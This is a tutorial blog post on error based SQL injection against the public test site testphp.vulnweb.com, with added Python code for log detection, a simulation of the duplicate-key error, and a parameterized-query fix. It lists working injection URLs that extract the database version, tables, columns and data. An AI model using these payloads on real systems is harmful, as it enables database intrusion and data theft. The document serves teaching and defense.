Error based SQL injection attack – All things in moderation

Error based SQL injection attack

Introduction

An error based technique is useful when the tester can't exploit the SQL injection vulnerability using another technique such as UNION. The error based technique consists in forcing the database to perform some operation whose result is an error, and then trying to extract data from the database by having it shown in the error message.

Example: we have a URL that may be injectable at the parameter 'cat': http://testphp.vulnweb.com/listproducts.php?cat=1

Detect and exploit SQL injection with the error based technique

Detect error based SQL injection

Let's add a single quote ('), a double quote ("), a semicolon (;), comment delimiters (-- or /* */, etc.) and other SQL keywords like 'AND' and 'OR' to the field or parameter under test.
In this example I have tested with a single quote ('):
http://testphp.vulnweb.com/listproducts.php?cat=1'
and the server responds with an error in SQL syntax:

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74 

Then the website has an error based SQL injection vulnerability!
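From the defender's side, the same probes and the same leaked error string are what to look for in logs. The following is an added example, not code from the original post: it scans constructed Apache-style access log lines for the probe characters and keywords listed above (plus the FLOOR(RAND(0)*2) GROUP BY pattern used later in the post) and checks a constructed response body for the MySQL/PHP error strings the post shows. All log lines, IP addresses and the response body are made up.

```python
"""Detection of error based SQL injection probing from the defender's side.

Added example, not part of the original post. It scans constructed
Apache-style access log lines for the probe characters and keywords the
post lists (', ", ;, -- or /* */, AND/OR) plus the FLOOR(RAND(0)*2) GROUP
BY pattern, and scans a constructed response body for the MySQL/PHP error
strings the post shows. All log lines and the response body are made up.
"""
import re
from urllib.parse import urlsplit, unquote_plus

# Probe patterns a tester injects into a parameter, in the order the post lists them.
PROBE_PATTERNS = [
    ("single quote", re.compile(r"'")),
    ("double quote", re.compile(r'"')),
    ("semicolon", re.compile(r";")),
    ("comment delimiter", re.compile(r"--|/\*|\*/")),
    ("boolean keyword", re.compile(r"\b(?:and|or)\b\s*[\w'\"(]", re.IGNORECASE)),
    ("group-by floor(rand) trick", re.compile(r"floor\s*\(\s*rand\s*\(", re.IGNORECASE)),
]

# Error strings a MySQL-backed PHP page leaks when an injection lands (from the post).
ERROR_SIGNATURES = [
    "You have an error in your SQL syntax",
    "Duplicate entry",
    "mysql_fetch_array() expects parameter 1 to be resource",
]

# Apache common log prefix: ip ident user [time] "METHOD url PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)


def query_params(url):
    """Yield (name, value) pairs, percent- and plus-decoded, splitting only on '&'
    so a ';' inside a payload stays part of the value."""
    for part in urlsplit(url).query.split("&"):
        if part:
            name, _, value = part.partition("=")
            yield unquote_plus(name), unquote_plus(value)


def inspect_request(url):
    """Return (param, decoded value, reason) findings for one request URL."""
    findings = []
    for name, value in query_params(url):
        for reason, pattern in PROBE_PATTERNS:
            if pattern.search(value):
                findings.append((name, value, reason))
    return findings


def inspect_response(body):
    """Return the leaked error signatures present in a response body."""
    return [sig for sig in ERROR_SIGNATURES if sig in body]


def scan_log(lines):
    """Return one alert per log line whose request carries injection probes."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = inspect_request(m.group("url"))
        if findings:
            alerts.append({"ip": m.group("ip"), "url": m.group("url"), "findings": findings})
    return alerts


# Constructed sample data: one normal request, the post's single-quote probe, and the
# post's FLOOR(RAND(0)*2) version payload, URL-encoded as a browser would send them.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /listproducts.php?cat=1%27 HTTP/1.1" 200 612',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /listproducts.php?cat=-1%20AND%20(SELECT%201%20FROM%20'
    '(SELECT%20count(*),CONCAT((SELECT%20@@version),0x3a,FLOOR(RAND(0)*2))%20x%20FROM%20'
    'information_schema.tables%20GROUP%20BY%20x)%20y);--+ HTTP/1.1" 200 690',
]
SAMPLE_ERROR_PAGE = (
    "Error: You have an error in your SQL syntax; check the manual that corresponds to your "
    "MySQL server version for the right syntax to use near ''' at line 1 "
    "Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given"
)

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["url"])
        for param, value, reason in alert["findings"]:
            print(f"  {param}={value!r}: {reason}")
    print("leaked errors:", inspect_response(SAMPLE_ERROR_PAGE))
```

The request-side patterns are deliberately broad (a single quote in a search field is not always an attack), so in practice they are best correlated with the response-side check: a request carrying probes followed by a response containing one of the error signatures is the high-confidence signal that the application is both injectable and leaking DBMS errors.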

Exploit

Consider the following SQL query:

SELECT * FROM users WHERE id=1;

Now replace id=1 with id=1 AND (SELECT 1 FROM (SELECT count(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y).

Consider the inner query:

SELECT COUNT(*), CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x

This query uses a GROUP BY statement to group the result set by one column x (I have selected column x with the expression CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x).

  • GROUP BY: The GROUP BY statement is used in conjunction with the aggregate functions to group the result-set by one or more columns.
  • FLOOR(X): Returns the largest integer value not greater than X.
  • FLOOR(RAND(0)*2): Returns one of two different numbers (0, 1).

The query above results in an error:

Error: Duplicate entry '5.1.73-0ubuntu0.10.04.1:1' for key 'group_key' 

This error occurs because GROUP BY requires unique group keys. Since COUNT(*) will return the same value each time, concatenating that and the output of FLOOR(RAND(0)*2) three times results in two different numbers (0, 1) and then a second instance of 1, which causes an error (duplicate entry for group key) that is displayed back to the user.
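To see exactly why three rows are enough, here is an added example (not code from the original post) that models how MySQL fills the GROUP BY temporary table: the key expression is evaluated once to look the group up and, if the group is new, evaluated a second time to build the inserted row, so a non-deterministic key can be inserted under a value that already exists. The values 0, 1, 1, 0, 1, 1 are assumed to be the first outputs of FLOOR(RAND(0)*2) for the seeded generator and are hard-coded rather than computed; the version string is the one from the post's error message.

```python
"""Why FLOOR(RAND(0)*2) inside GROUP BY raises 'Duplicate entry'.

Added example, not code from the original post. It models how MySQL fills
the GROUP BY temporary table: the key expression is evaluated once to look
the group up and, when the group is new, evaluated again to insert the row,
so a non-deterministic key can be inserted under a value that is already
present. Assumption: the first values of FLOOR(RAND(0)*2) with the seeded
generator are taken as the commonly reported sequence 0,1,1,0,1,1 and are
hard-coded rather than computed.
"""

# Assumed first six values of FLOOR(RAND(0)*2); the error is triggered
# before more than five of them are consumed.
RAND0_FLOOR_SEQUENCE = (0, 1, 1, 0, 1, 1)


class DuplicateEntryError(Exception):
    """Stands in for MySQL error 1062 on the GROUP BY temporary table."""


def group_by_rand_key(n_rows, prefix="5.1.73-0ubuntu0.10.04.1"):
    """Simulate
        SELECT COUNT(*), CONCAT(prefix, ':', FLOOR(RAND(0)*2)) x FROM t GROUP BY x
    over a table with n_rows rows. Returns {group key: count} or raises
    DuplicateEntryError the way MySQL does.
    """
    values = iter(RAND0_FLOOR_SEQUENCE)
    groups = {}
    for _ in range(n_rows):
        key = f"{prefix}:{next(values)}"      # evaluation 1: look the group up
        if key in groups:
            groups[key] += 1
            continue
        key = f"{prefix}:{next(values)}"      # evaluation 2: build the row to insert
        if key in groups:                     # the re-evaluated key collides
            raise DuplicateEntryError(f"Duplicate entry '{key}' for key 'group_key'")
        groups[key] = 1
    return groups


def leaked_error_message(n_rows, prefix="5.1.73-0ubuntu0.10.04.1"):
    """Return the error text the page would display, or None when the query succeeds."""
    try:
        group_by_rand_key(n_rows, prefix)
    except DuplicateEntryError as exc:
        return str(exc)
    return None


def rows_until_error(limit=10):
    """Smallest table size for which the GROUP BY trick fails (the post says three)."""
    for n in range(1, limit + 1):
        if leaked_error_message(n) is not None:
            return n
    return None


if __name__ == "__main__":
    for n in (1, 2, 3):
        print(n, "row(s):", leaked_error_message(n) or group_by_rand_key(n))
```

Walking through it: row 1 evaluates to key :0, which is new, so the row is inserted with a fresh evaluation, :1. Row 2 evaluates to :1, which exists, so the count is incremented. Row 3 evaluates to :0 again, which is still absent, and the insert re-evaluates to :1, colliding with the existing group. That is why information_schema.tables is used as the FROM table: it is guaranteed to have at least three rows on any MySQL server.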

The full query will be:

SELECT * FROM users WHERE id=1  AND (SELECT 1 FROM (SELECT count(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y);

Then I get the DBMS version: 5.1.73-0ubuntu0.10.04.1

Now let's inject this payload to get database information from the website.

AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((<Your Query here to return single row >),0x3a, FLOOR(RAND (0) *2)) x FROM information_schema.tables GROUP BY x) y);

1, Getting database version

payload:

http://testphp.vulnweb.com/listproducts.php?cat=-1 AND (SELECT 1 FROM (SELECT count(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y);--+

sample output:

2, Getting database

payload:

http://testphp.vulnweb.com/listproducts.php?cat=-1 AND (SELECT 1 FROM (SELECT count(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y);--+

sample output:

3, Getting tables

payload:

http://testphp.vulnweb.com/listproducts.php?cat=-1 AND (SELECT 1 FROM (SELECT count(*),CONCAT((SELECT table_name from information_schema.tables where table_schema='acuart' limit 0,1),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y);--+

sample output:

4, Getting columns

payload:

http://testphp.vulnweb.com/listproducts.php?cat=-1 AND (SELECT 1 FROM (SELECT count(*),CONCAT((SELECT column_name from information_schema.columns where table_name='artists' limit 1,1),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y);--+

sample output:

5, Dump column data

payload:

http://testphp.vulnweb.com/listproducts.php?cat=-1 AND (SELECT 1 FROM (SELECT count(*),CONCAT((SELECT aname from artists  limit 1,1),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y);--+

sample output:

Following the steps above, we have extracted all of the database's data using error based SQL injection!
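Every step above depends on two defects in the application: the `cat` parameter is concatenated into the SQL text, and the raw DBMS error is printed on the page. The following is an added example, not code from the original post or from the vulnweb test site. It rebuilds a tiny products table in sqlite3 (an assumption: the post's target runs MySQL, but the string-building defect is identical) and contrasts the vulnerable pattern with a parameterized query plus input validation that keeps DB errors server-side; the table contents are constructed.

```python
"""Root cause and fix for the listproducts.php?cat= style injection.

Added example, not code from the original post or from the vulnweb test
site. It rebuilds a tiny products table in sqlite3 (an assumption: the
post's target runs MySQL, but the string-building defect is identical) and
contrasts the two ways of handling the `cat` parameter: concatenating it
into the SQL text, where the post's single-quote probe becomes SQL and the
raw DBMS error reaches the page, and a parameterized query with input
validation, where the value is always data and errors are never echoed.
"""
import logging
import sqlite3

log = logging.getLogger("listproducts")


def make_db():
    """Constructed in-memory stand-in for the site's products table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT)")
    con.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, 1, "Painting"), (2, 1, "Print"), (3, 2, "Sculpture")],
    )
    return con


def list_products_vulnerable(con, cat):
    """Mirrors the PHP pattern  "... WHERE cat=" . $_GET['cat']  and echoes the DB error."""
    sql = "SELECT name FROM products WHERE cat=" + cat   # user input becomes SQL text
    try:
        return [row[0] for row in con.execute(sql)]
    except sqlite3.Error as exc:
        return f"Error: {exc}"       # this echoed message is what error based SQLi reads


def list_products_fixed(con, cat):
    """Validate the type, bind the value as a parameter, and keep DB errors server-side."""
    try:
        cat_id = int(cat)            # 'cat' is an integer id; anything else is rejected
    except ValueError:
        return []                    # a 400 in a real handler; the DB is never queried
    try:
        rows = con.execute("SELECT name FROM products WHERE cat=?", (cat_id,))
        return [row[0] for row in rows]
    except sqlite3.Error as exc:
        log.error("query failed: %s", exc)   # details go to the log, not the response
        return []


if __name__ == "__main__":
    con = make_db()
    for cat in ("1", "1'"):
        print(f"cat={cat!r}")
        print("  vulnerable:", list_products_vulnerable(con, cat))
        print("  fixed:     ", list_products_fixed(con, cat))
```

With the parameterized version the single-quote probe from the detection step produces no SQL error at all, and even if a query did fail the page would show nothing the GROUP BY trick could read. Parameter binding is the primary fix; the integer validation and the generic error handling are defense in depth that also remove the side channel this whole technique relies on.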
